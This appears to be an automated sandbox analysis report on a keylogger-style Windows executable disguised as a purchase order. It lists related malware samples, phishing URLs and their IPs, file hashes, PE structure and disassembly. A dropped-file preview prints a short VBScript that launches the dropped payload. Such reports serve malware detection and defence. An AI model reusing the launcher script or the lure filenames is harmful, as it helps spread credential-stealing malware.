                                                                          rNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 132.226.8.169
                                                                          MT LADY YASSO VESSEL BRIEF DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 193.122.130.0
                                                                          IMG_1507_1603.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 158.101.44.242
                                                                          MT103 SWIFT COPY.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                                                                          • 158.101.44.242
                                                                          SWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 193.122.130.0
                                                                          us2.smtp.mailhostbox.com2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 208.91.199.225
                                                                          z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 208.91.198.143
                                                                          Invoice Payment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 208.91.199.224
                                                                          z47TTSWIFTCOPY.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.91.199.223
                                                                          Invoice Request.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.91.199.224
                                                                          SecuriteInfo.com.Trojan.PackedNET.3050.5454.27030.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 208.91.199.225
                                                                          z68ORDER.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.91.198.143
                                                                          SecuriteInfo.com.Win32.PWSX-gen.12778.1808.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 208.91.199.225
                                                                          EXmRyGiPUc.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.91.199.223
                                                                          z17invoice.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 208.91.198.143
                                                                          api.telegram.org2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          Order_List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          Zahlungsbest#U00e4tigung.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 149.154.167.220
                                                                          z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          rNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          Order #SS1953pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 149.154.167.220
                                                                          SWIFT.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          Quotation 47923.exeGet hashmaliciousSnake Keylogger, VIP Keylogger, XRedBrowse
                                                                          • 149.154.167.220
                                                                          QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          TELEGRAMRU2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          http://ankaraspotesya.comGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.99
                                                                          Order_List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                          • 149.154.167.99
                                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                          • 149.154.167.99
                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                          • 149.154.167.99
                                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                          • 149.154.167.99
                                                                          http://web.tele-gam.top/Get hashmaliciousUnknownBrowse
                                                                          • 149.154.167.99
                                                                          https://aisthd.xyz/Get hashmaliciousUnknownBrowse
                                                                          • 149.154.167.99
                                                                          Zahlungsbest#U00e4tigung.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 149.154.167.220
                                                                          CLOUDFLARENETUSSecuriteInfo.com.Win32.Trojan.Agent.RG6EPY.31891.24669.exeGet hashmaliciousUnknownBrowse
                                                                          • 172.67.186.24
                                                                          2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          ELECTRONIC RECEIPT_658776783.htmGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          https://rodator.freshdesk.com/en/support/solutions/articles/156000013321-solicitud-de-presupuesto-1454082Get hashmaliciousUnknownBrowse
                                                                          • 104.18.95.41
                                                                          https://sampension-account-docsign.net.nezzegvipaaqrhsf.com/app7c874963274eb9aecdb8a4dda6dd5c85/66d4bcaf4e31753ebfee0548Get hashmaliciousUnknownBrowse
                                                                          • 104.18.86.42
                                                                          original (37).emlGet hashmaliciousUnknownBrowse
                                                                          • 104.26.13.205
                                                                          http://gartner.comGet hashmaliciousUnknownBrowse
                                                                          • 104.18.86.42
                                                                          https://tayakay.comGet hashmaliciousUnknownBrowse
                                                                          • 1.1.1.1
                                                                          Biolegend.com_Report_93129.pdfGet hashmaliciousUnknownBrowse
                                                                          • 188.114.96.3
                                                                          https://doc.wilkka.com/mo/Get hashmaliciousHTMLPhisherBrowse
                                                                          • 104.18.11.207
                                                                          PUBLIC-DOMAIN-REGISTRYUS2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 208.91.199.225
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/m%C2%ADd%C2%ADra%C2%ADrq%C2%ADu%C2%ADit%C2%AD%C2%ADec%C2%ADt%C2%ADu%C2%ADr%C2%ADa%C2%AD.%C2%ADc%C2%ADom/xsGet hashmaliciousHTMLPhisherBrowse
                                                                          • 162.215.254.118
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/p%C2%ADep%C2%ADe%C2%ADm%C2%ADu%C2%ADj%C2%ADi%C2%ADc%C2%ADa%C2%AD.%C2%ADc%C2%ADom/hjGet hashmaliciousUnknownBrowse
                                                                          • 162.215.254.118
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/m%C2%ADd%C2%ADra%C2%ADrq%C2%ADu%C2%ADit%C2%AD%C2%ADec%C2%ADt%C2%ADu%C2%ADr%C2%ADa%C2%AD.%C2%ADc%C2%ADom/xsGet hashmaliciousHTMLPhisherBrowse
                                                                          • 162.215.254.118
                                                                          z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 208.91.198.143
                                                                          Quote 20240533-REV2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 199.79.62.115
                                                                          Invoice Payment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 208.91.199.224
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bp%C2%ADri%C2%ADvi%C2%ADl%C3%A8%C2%ADge%C2%ADt%C2%ADv.%E2%80%8Bf%C2%ADr%2Fddd%2Fopc%2FESwvA1jmTcm6YlLT8cDALmb3/cGxvdHRlYm9yZC5ub0Bwb3N0bm9yZC5jb20=Get hashmaliciousUnknownBrowse
                                                                          • 116.206.104.99
                                                                          Shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.251.85.202
                                                                          PO- 220135.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 199.79.62.115
                                                                          PUBLIC-DOMAIN-REGISTRYUS2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 208.91.199.225
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/m%C2%ADd%C2%ADra%C2%ADrq%C2%ADu%C2%ADit%C2%AD%C2%ADec%C2%ADt%C2%ADu%C2%ADr%C2%ADa%C2%AD.%C2%ADc%C2%ADom/xsGet hashmaliciousHTMLPhisherBrowse
                                                                          • 162.215.254.118
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/p%C2%ADep%C2%ADe%C2%ADm%C2%ADu%C2%ADj%C2%ADi%C2%ADc%C2%ADa%C2%AD.%C2%ADc%C2%ADom/hjGet hashmaliciousUnknownBrowse
                                                                          • 162.215.254.118
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/m%C2%ADd%C2%ADra%C2%ADrq%C2%ADu%C2%ADit%C2%AD%C2%ADec%C2%ADt%C2%ADu%C2%ADr%C2%ADa%C2%AD.%C2%ADc%C2%ADom/xsGet hashmaliciousHTMLPhisherBrowse
                                                                          • 162.215.254.118
                                                                          z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 208.91.198.143
                                                                          Quote 20240533-REV2.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 199.79.62.115
                                                                          Invoice Payment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 208.91.199.224
                                                                          https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bp%C2%ADri%C2%ADvi%C2%ADl%C3%A8%C2%ADge%C2%ADt%C2%ADv.%E2%80%8Bf%C2%ADr%2Fddd%2Fopc%2FESwvA1jmTcm6YlLT8cDALmb3/cGxvdHRlYm9yZC5ub0Bwb3N0bm9yZC5jb20=Get hashmaliciousUnknownBrowse
                                                                          • 116.206.104.99
                                                                          Shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 162.251.85.202
                                                                          PO- 220135.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                          • 199.79.62.115
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          54328bd36c14bd82ddaa0c04b25ed9ad2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          Order_List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          ESD99W89W99-PO9W2788Q-SHK092782.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          PO#180924.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          z1newpo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          rNEWPURCHASEORDER094637.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          DbwdFVTAXI.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                          • 188.114.97.3
                                                                          4b8lIXw22G.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                          • 188.114.97.3
                                                                          HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                                          • 188.114.97.3
                                                                          MT LADY YASSO VESSEL BRIEF DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 188.114.97.3
                                                                          3b5074b1b5d032e5620f69f9f700ff0e2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          ELECTRONIC RECEIPT_658776783.htmGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          https://sampension-account-docsign.net.nezzegvipaaqrhsf.com/app7c874963274eb9aecdb8a4dda6dd5c85/66d4bcaf4e31753ebfee0548Get hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          z3hL1cM0zb.exeGet hashmaliciousQuasarBrowse
                                                                          • 149.154.167.220
                                                                          http://ankaraspotesya.comGet hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          Order_List.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          PT54FFSL7ET46RASB.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, Xmrig, zgRATBrowse
                                                                          • 149.154.167.220
                                                                          PT54FFSL7ET46RASB.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                                                                          • 149.154.167.220
                                                                          o9OIGsDt4m.exeGet hashmaliciousXmrigBrowse
                                                                          • 149.154.167.220
                                                                          http://santander-competencia.activaonline.cl/Get hashmaliciousUnknownBrowse
                                                                          • 149.154.167.220
                                                                          No context
                                                                          Process:C:\Users\user\Desktop\New Order PO#86637.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):275456
                                                                          Entropy (8bit):6.861592083430848
                                                                          Encrypted:false
                                                                          SSDEEP:6144:/64HX+XkPN/l+vR9youO6DIKaRAYT/7bExeJW+F6C78gwtv10j/hWok3:i43+XkPOC7BW/7bE8JFF6C78gwtv10jg
                                                                          MD5:F63F93DDE97D0C024549598062C51A0E
                                                                          SHA1:308D8E6B96276078591AFAECC73343128062C079
                                                                          SHA-256:5B5F8A5C606CE808848B71B08332B05131AA260FF4784089BC311526DD160458
                                                                          SHA-512:09CDC365A2BBF72BD971B383DC315AB8D07D918878CC64B817F45A1C00CC07D4441D288359D5C42730E2F0928D1BC1960563FF2FE1651B58C03D00D523F649EA
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:...3;UQ9A18K.VQ.V738UQ9.18K9CVQYV738UQ9E18K9CVQYV738UQ9E18K.CVQWI.=8.X.d.9..b.90%.CJ:6K$\.(X-8>-vUV.'$WeXVk}..q49SV.X\3a18K9CVQ..73tTR9...-9CVQYV73.US8N0hK9]RQYB738UQ9..<K9cVQY.338U.9E.8K9AVQ]V738UQ9A18K9CVQY.338WQ9E18K;C..YV'38EQ9E1(K9SVQYV73(UQ9E18K9CVQ=j33oUQ9Eq<K.SVQYV738UQ9E18K9CVQY6334UQ9E18K9CVQYV738UQ9E18K9CVQYV738UQ9E18K9CVQYV738UQ9E.8K1CVQYV738UQ9M.8KqCVQYV738UQ9kE]3MCVQ.J338uQ9E/<K9AVQYV738UQ9E18K.CV1w$DA[UQ9R!8K9.RQYD738uU9E18K9CVQYV73xUQykC]'V VQUV7385U9E38K9qRQYV738UQ9E18KyCV.YV738UQ9E18K9CVQ.j338UQ9.18K;CSQ..530.P9F18K.CVW..53.UQ9E18K9CVQYV738UQ9E18K9CVQYV738UQ9E18K9CVQ.+.<..P6..K9CVQYW50<SY1E18K9CVQ'V73~UQ9.18K.CVQ|V73UUQ9a18KGCVQ'V73\UQ9718KXCVQ.V73WUQ9+18KGCVQGT..8U[.c1:c.CV[Y|.@.UQ3.08K=0uQY\.18UUJa18A.@VQ]%.38_.=E1<8.CV[.S73<..9F..M9CM>`V798V.,C18P.eVSql732U{.E2.^?CVJst71.\Q9A.n8$CVWq.732!X9E3.A9CR{GT.w8U[.gO3K9G}QstI?8UU.E..54CVUrV.-:.\9E5.iGMVQ]}7..+^9E5.K.]T.VV77.w/)E1<`9it/HV77.U{.;#8K=hV{{($38Qz9o.F_9CRzY|.M-UQ=n1.iGUVQ]}7..+F9E5.K.a(IYV3.8.O;.)8K=iP{;VE..U!:
                                                                          Process:C:\Users\user\Desktop\New Order PO#86637.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1332869
                                                                          Entropy (8bit):7.435924090424551
                                                                          Encrypted:false
                                                                          SSDEEP:24576:pRmJkcoQricOIQxiZY1iaJGnk+r8OJZtwWayjlUBo0oW/e8dLd+vky:mJZoQrbTFZY1iaJ0ltDtwWhRUBBrWULg
                                                                          MD5:6FA58744FFB09C72C150F276F7C79ECD
                                                                          SHA1:F7202152B97A7C9396B43C53D30DE9353CBF8836
                                                                          SHA-256:5C6FF5340700194B1EC369D0FA8C4D03320A3E7379903D19A7C1FCE628EE73BC
                                                                          SHA-512:0B073DEA4A142F75250362B3DB6083F0591E83B07405B196D90E5EF8263C7497F328D9BB9A298B0770EFB1AE8638D88990AFD47A1B9601BDF27C91A4E2FA7ADA
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 47%
                                                                          Reputation:low
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@...........................................@.......@.........................T.......x7........................................................................... ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...x7.......8...T..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\directory\name.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):270
                                                                          Entropy (8bit):3.4297698362729916
                                                                          Encrypted:false
                                                                          SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlzQ1A1z4mA2n
                                                                          MD5:3DA73F5D6073C0D8F7B9CEE8DF5035A7
                                                                          SHA1:D4B44315FD7C6171A9CC03899A00E593AE78CDE7
                                                                          SHA-256:1F2D7E91D96B7DA16BC230D9C519E5E0A6A78FCD6B3468E590D5A97239BB420B
                                                                          SHA-512:CE2041AA9AAFE863C44296E4ED58BA207E4849584AB057B93354F10679DC1BFAE50241EEDAD74DCC4D7AF6C8ADC3A97E4581F56E5E71955651D52BA866ED763B
                                                                          Malicious:true
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):7.435924090424551
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:New Order PO#86637.exe
                                                                          File size:1'332'869 bytes
                                                                          MD5:6fa58744ffb09c72c150f276f7c79ecd
                                                                          SHA1:f7202152b97a7c9396b43c53d30de9353cbf8836
                                                                          SHA256:5c6ff5340700194b1ec369d0fa8c4d03320a3e7379903d19a7c1fce628ee73bc
                                                                          SHA512:0b073dea4a142f75250362b3db6083f0591e83b07405b196d90e5ef8263c7497f328d9bb9a298b0770efb1ae8638d88990afd47a1b9601bdf27c91a4e2fa7ada
                                                                          SSDEEP:24576:pRmJkcoQricOIQxiZY1iaJGnk+r8OJZtwWayjlUBo0oW/e8dLd+vky:mJZoQrbTFZY1iaJ0ltDtwWhRUBBrWULg
                                                                          TLSH:B755D021A4D290F5D1E22E725D39F355BA7A6C260322819FE3C839F10E73781D6296F7
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                          Icon Hash:cf818c848c8a814f
                                                                          Entrypoint:0x4165c1
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:5
                                                                          OS Version Minor:0
                                                                          File Version Major:5
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:5
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                          Instruction
                                                                          call 00007F11E520B26Bh
                                                                          jmp 00007F11E52020DEh
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          push edi
                                                                          push esi
                                                                          mov esi, dword ptr [ebp+0Ch]
                                                                          mov ecx, dword ptr [ebp+10h]
                                                                          mov edi, dword ptr [ebp+08h]
                                                                          mov eax, ecx
                                                                          mov edx, ecx
                                                                          add eax, esi
                                                                          cmp edi, esi
                                                                          jbe 00007F11E520225Ah
                                                                          cmp edi, eax
                                                                          jc 00007F11E52023F6h
                                                                          cmp ecx, 00000080h
                                                                          jc 00007F11E520226Eh
                                                                          cmp dword ptr [004A9724h], 00000000h
                                                                          je 00007F11E5202265h
                                                                          push edi
                                                                          push esi
                                                                          and edi, 0Fh
                                                                          and esi, 0Fh
                                                                          cmp edi, esi
                                                                          pop esi
                                                                          pop edi
                                                                          jne 00007F11E5202257h
                                                                          jmp 00007F11E5202632h
                                                                          test edi, 00000003h
                                                                          jne 00007F11E5202266h
                                                                          shr ecx, 02h
                                                                          and edx, 03h
                                                                          cmp ecx, 08h
                                                                          jc 00007F11E520227Bh
                                                                          rep movsd
                                                                          jmp dword ptr [00416740h+edx*4]
                                                                          mov eax, edi
                                                                          mov edx, 00000003h
                                                                          sub ecx, 04h
                                                                          jc 00007F11E520225Eh
                                                                          and eax, 03h
                                                                          add ecx, eax
                                                                          jmp dword ptr [00416654h+eax*4]
                                                                          jmp dword ptr [00416750h+ecx*4]
                                                                          nop
                                                                          jmp dword ptr [004166D4h+ecx*4]
                                                                          nop
                                                                          inc cx
                                                                          add byte ptr [eax-4BFFBE9Ah], dl
                                                                          inc cx
                                                                          add byte ptr [ebx], ah
                                                                          ror dword ptr [edx-75F877FAh], 1
                                                                          inc esi
                                                                          add dword ptr [eax+468A0147h], ecx
                                                                          add al, cl
                                                                          jmp 00007F11E767AA57h
                                                                          add esi, 03h
                                                                          add edi, 03h
                                                                          cmp ecx, 08h
                                                                          jc 00007F11E520221Eh
                                                                          rep movsd
                                                                          jmp dword ptr [00000000h+edx*4]
                                                                          Programming Language:
                                                                          • [ C ] VS2010 SP1 build 40219
                                                                          • [C++] VS2010 SP1 build 40219
                                                                          • [ C ] VS2008 SP1 build 30729
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          • [ASM] VS2010 SP1 build 40219
                                                                          • [RES] VS2010 SP1 build 40219
                                                                          • [LNK] VS2010 SP1 build 40219
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x13778.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0xab0000x137780x13800deaf8cf0ab1ab56c5b616d6567464a39False0.08774038461538461data3.8891256142087705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0xab4480x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                          RT_ICON0xab5700x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                          RT_ICON0xab6980x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                          RT_ICON0xab7c00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishGreat Britain0.05220040222406246
                                                                          RT_MENU0xbbfe80x50dataEnglishGreat Britain0.9
                                                                          RT_DIALOG0xbc0380xfcdataEnglishGreat Britain0.6507936507936508
                                                                          RT_STRING0xbc1380x530dataEnglishGreat Britain0.33960843373493976
                                                                          RT_STRING0xbc6680x690dataEnglishGreat Britain0.26964285714285713
                                                                          RT_STRING0xbccf80x4d0dataEnglishGreat Britain0.36363636363636365
                                                                          RT_STRING0xbd1c80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                          RT_STRING0xbd7c80x65cdataEnglishGreat Britain0.34336609336609336
                                                                          RT_STRING0xbde280x388dataEnglishGreat Britain0.377212389380531
                                                                          RT_STRING0xbe1b00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                          RT_GROUP_ICON0xbe3080x14dataEnglishGreat Britain1.25
                                                                          RT_GROUP_ICON0xbe3200x14dataEnglishGreat Britain1.15
                                                                          RT_GROUP_ICON0xbe3380x14dataEnglishGreat Britain1.25
                                                                          RT_GROUP_ICON0xbe3500x14dataEnglishGreat Britain1.25
                                                                          RT_VERSION0xbe3680x19cdataEnglishGreat Britain0.5339805825242718
                                                                          RT_MANIFEST0xbe5080x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                          DLLImport
                                                                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
